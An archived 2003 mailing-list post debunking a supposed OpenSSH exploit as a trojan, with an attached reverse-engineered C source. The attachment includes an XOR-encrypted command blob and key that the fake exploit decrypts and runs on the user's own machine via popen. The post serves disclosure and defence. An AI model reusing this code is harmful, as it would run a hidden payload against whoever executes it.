lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.NEB.4.53.0309190858320.13791@speedy.ludd.luth.se>
From: jlo at ludd.luth.se (Lars Olsson)
Subject: Re: new openssh exploit in the wild! * is FAKE
 AS SH@!*

On Fri, 19 Sep 2003, Vitaly Osipov wrote:

> This means that the original poster (gordon last) made it up himself, because he is saying :
>
> >> > i looked at this piece of exploit... it is binary so i'am not sure if
> >> > this is a trojan or a backdoor or a virus. but i can't see anything
> >> > strange while sniffing the exploit traffic. and i got root on serveral
> >> > of my openbsd boxes with that. the bruteforcer seems to be very good.
>
> which is obviously not true. Btw as far as I understand, the troyan code is triggered when
> the "exploit" is run with the offset specified, and not in a "bruteforcing" mode.
>

The trojan seems to be triggered in both cases, providing that the
"bruteforcing" terminates. I haven't test run the code but I did a very
quick reverse of the binary. It connects to the remote sshd but only
sends the key used for descrmbling the trojan code while it pretends
to search for offsets.


/Lars
-------------- next part --------------
/* reversed C source of supposed ssh-exploit */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <time.h>
#include <stdio.h>

extern FILE *popen(const char *, const char *);

static char nop[] = { 0x90, 0 };
static char c[] = {		/* ciphertext */
	0x4c, 0x03, 0x06, 0x09, 0x4c, 0x20, 0x45, 0x17,
	0x1f, 0x16, 0x52, 0x19, 0x78, 0x5d, 0x54, 0x5c,
	0x54, 0x51, 0x10, 0x3a, 0x5d, 0x4b, 0x5c, 0x4a,
	0x03, 0x4a, 0x6e, 0x48, 0x17, 0x0e, 0x47, 0x41,
	0x1d, 0x3e, 0x47, 0x4b, 0x03, 0x11, 0x02, 0x0c,
	0x70, 0x06, 0x17, 0x15, 0x12, 0x05, 0x18, 0x20,
	0x02, 0x07, 0x0e, 0x0a, 0x41, 0x01, 0x73, 0x1e,
	0x17, 0x55, 0x5f, 0x3d, 0x07, 0x31, 0x3b, 0x40,
	0x08, 0x32, 0x39, 0x4e, 0x6b, 0x3f, 0x53, 0x52,
	0x39, 0x45, 0x74, 0x73, 0x5f, 0x02, 0x3e, 0x4a,
	0x2c, 0x65, 0x49, 0x54, 0x4a, 0x0c, 0x50, 0x29,
	0x68, 0x61, 0x0f, 0x2a, 0x17, 0x2c, 0x30, 0x13,
	0x3a, 0x56, 0x56, 0x55, 0x54, 0x50, 0x19, 0x30,
	0x5d, 0x5d, 0x5f, 0x5c, 0x58, 0x1a, 0x3a, 0x50,
	0x5e, 0x5c, 0x5f, 0x43, 0x03, 0x3e, 0x59, 0x44,
	0x49, 0x00, 0x15, 0x40, 0x2f, 0x14, 0x0c, 0x07,
	0x01, 0x0e, 0x54, 0x3b, 0x47, 0x4b, 0x15, 0x07,
	0x08, 0x4d, 0x2f, 0x0e, 0x02, 0x05, 0x0a, 0x0f,
	0x45, 0x69, 0x00, 0x44, 0x4b, 0x04, 0x41, 0x1d,
	0x2f, 0x13, 0x09, 0x16, 0x4a, 0x4f, 0x57, 0x6d,
	0x17, 0x5f, 0x05, 0x04, 0x15, 0x03, 0x2f, 0x02,
	0x10, 0x05, 0x4a, 0x11, 0x42, 0x73, 0x14, 0x13,
	0x02, 0x45, 0x4e, 0x46, 0x74, 0x04, 0x4b, 0x15,
	0x0d, 0x00, 0x47, 0x6f, 0x10, 0x44, 0x49, 0x17,
	0x0e, 0x4c, 0x74, 0x48, 0x4a, 0x15, 0x16, 0x09,
	0x09, 0x2f, 0x0c, 0x0a, 0x09, 0x12, 0x0f, 0x7c,
	0x68, 0x08, 0x17, 0x12, 0x16, 0x41, 0x1d, 0x3e,
	0x47, 0x4b, 0x12, 0x08, 0x11, 0x0c, 0x2e, 0x13,
	0x09, 0x16, 0x5e, 0x41, 0x45, 0x69, 0x09, 0x00,
	0x46, 0x4a, 0x09, 0x4c, 0x6d, 0x02, 0x44, 0x4b,
	0x0b, 0x00, 0x4e, 0x65, 0x47, 0x0f, 0x08, 0x0a,
	0x16, 0x4d, 0x5f, 0x0f, 0x0b, 0x15, 0x11, 0x12,
	0x03, 0x2d, 0x02, 0x1c, 0x03, 0x06, 0x41, 0x40,
	0x61, 0x13, 0x44, 0x1d, 0x18, 0x41, 0x1d, 0x3e,
	0x47, 0x4b, 0x12, 0x08, 0x11, 0x0c, 0x2e, 0x13,
	0x09, 0x16, 0x5e, 0x02, 0x42, 0x74, 0x47, 0x4b,
	0x12, 0x08, 0x11, 0x0c, 0x2e, 0x13, 0x09, 0x16,
	0x45, 0x1d, 0x03, 0x2f, 0x12, 0x17, 0x14, 0x4a,
	0x12, 0x41, 0x69, 0x09, 0x4b, 0x15, 0x00, 0x0f,
	0x47, 0x6d, 0x06, 0x0d, 0x0a, 0x45, 0x4c, 0x45,
	0x20, 0x08, 0x13, 0x08, 0x04, 0x06, 0x46, 0x40,
	0x00, 0x09, 0x1e, 0x4b, 0x05, 0x46, 0x20, 0x0a,
	0x54, 0x08, 0x0e, 0x04, 0x5a, 0x68, 0x06, 0x07,
	0x0d, 0x25, 0x12, 0x56, 0x70, 0x02, 0x16, 0x0b,
	0x04, 0x13, 0x48, 0x74, 0x49, 0x00, 0x03, 0x4c,
	0x41, 0x05, 0x3e, 0x47, 0x4b, 0x02, 0x00, 0x17,
	0x0c, 0x6e, 0x12, 0x08, 0x0a, 0x45, 0x5a, 0x03,
	0x72, 0x0a, 0x44, 0x4b, 0x03, 0x41, 0x0c, 0x74,
	0x0a, 0x14, 0x49, 0x4b, 0x15, 0x4e, 0x70, 0x5c,
	0
};
static char s[] = "gdfea#";	/* key */

int
main(argc, argv)
	int argc;
	char **argv;
{

	char *recvbuf, *sendbuf, *buf;
	time_t initial_time, i;
	int sockfd;
	struct sockaddr_in addr;
	int start, offset, j, len;
	ssize_t rcvd;
	FILE *(*popen_ptr)(const char *, const char *);

	recvbuf = (char *)malloc(255);	/* recvbuf = 0xffffffe8(%ebp) */
	sendbuf = (char *)malloc(255);	/* sendbuf = 0xffffffc8(%ebp) */

	printf("theosshucksass.c - remote openssh buffer management sploit\n");
	printf("by raazab/m0nkeyhack@...ermarkt.de\n");
	
	if (argc < 2) {
		printf("usage: ./a.out <ip> [<offset>]\n\n");
		printf("offset: no offset for bruteforce\n");
		exit (0);
	}
	/* 0x80488a6 */
	if (getuid() != 0) {
		printf("\n sorry dude need root for rawip\n");	/* heh */
		exit (0);
	}
	/* 0x80488d0 */
	initial_time = time(NULL);	/* initial_time = 0xffffffd0(%ebp) */
	srand(initial_time);

	printf("\nr00ting box...\n");
	printf("\thost: %s\n", argv[1]);
	printf("\toffset: %s\n\n", argv[2]);	/* hmmm? */

	j = 15;				/* j = 0xffffffcc(%ebp) */

	printf("[*] building socket\n");

	sockfd = socket(AF_INET, SOCK_STREAM, 0);	/* sockfd = 0xffffffec(%ebp) */

	addr.sin_family = AF_INET;	/* addr.sin_family = 0xfffffff0(%ebp) */
	addr.sin_port = htons(22);	/* addr.sin_port = 0xfffffff2(%ebp) */
	addr.sin_addr.s_addr = inet_addr(argv[1]);	/* addr.sin_addr = 0xfffffff4(%ebp) */

	printf("[*] connecting to victim\n");

_reconnect:
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
		printf("TERROR\n");
		exit (0);
	}
	/* 0x80489e0 */

	recv(sockfd, recvbuf, 255, 0);

	printf("\tVictim: %s\n", recvbuf);

	if (argv[2] == NULL) {
		printf("[*] no offset given: brute force - this may take a few minutes\n");
		start = offset = brfrcffst();	/* start = 0xffffffd4(%ebp) */
						/* offset = 0xffffffe0(%ebp) */
_retry:
		j++;
		printf("\tTrying 0x%x\t", offset);
		fflush(stdout);

		for (i = 0; i < j; i += 6) {		/* i = 0xffffffdc(%ebp) */
			if (write(sockfd, s, strlen(s) + 1) == 0) {
				break;
			}
			/* 0x8048ab2 */
			i = time(NULL);
			for (;;) {
				/* 8048ac3 */
				rcvd = recv(sockfd, recvbuf, 255, MSG_WAITALL);	/* rcvd = 0xffffffd8(%ebp) */
				if (rcvd > 0) {
					break;
				}
				if ((time(NULL) - i) > 4 && (time(NULL) - initial_time) > 41) {
					break;
				}
				/* 0x8048b20 */
			}
		}
		/* 0x8048b30 */
		if (rcvd > 0 || (time(NULL) - initial_time) > 41) {
			/* 0x8048b51 */
			printf(":-)\n");
			printf("[*] Gotcha!\n");
			buf = (char *)malloc(15);			/* buf = 0xffffffc0(%ebp) */
			sprintf(buf, "%x", offset);
		} else {
			/* 0x8048bb0 */
			printf(":-/\n");
			if (offset > start) {
				printf("[*] reconnecting \n");
				close(sockfd);
				goto _reconnect;
			} else {
				offset += 4;
				goto _retry;
			}
		}
	}
	/* 0x8048c00 */

	printf ("[*] calculating nops\n");

	popen_ptr = popen;

	for (len = 0; len < strlen(recvbuf); len++) {
		strcat(sendbuf, nop);
	}
	/* 0x8048c51 */
	printf("[*] sending nops\n");

	write(sockfd, sendbuf, len);

	printf("[*] sending shellcode\n");

	/* decrypt ciphertext via a simple xor algo */
	for (i = 1, j = 0; j < sizeof(c); i++, j++) {
		if (i >= sizeof(s)) {
			i = 0;
		}
		c[j] ^= s[i];
	}
	/* 0x8048ce3 */
	write(sockfd, (*popen_ptr)(c, "r"));

	printf("[*] trying to spawn remote shell on port 31337\n");

	write(sockfd, s, strlen(s));

	printf("[*] closing socket\n\n");

	close(sockfd);

	printf("all seems fine... try to connect to port 31337 on %s\n", argv[1]);

}

int
brfrcffst()
{
	return (rand()<<2);
}

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ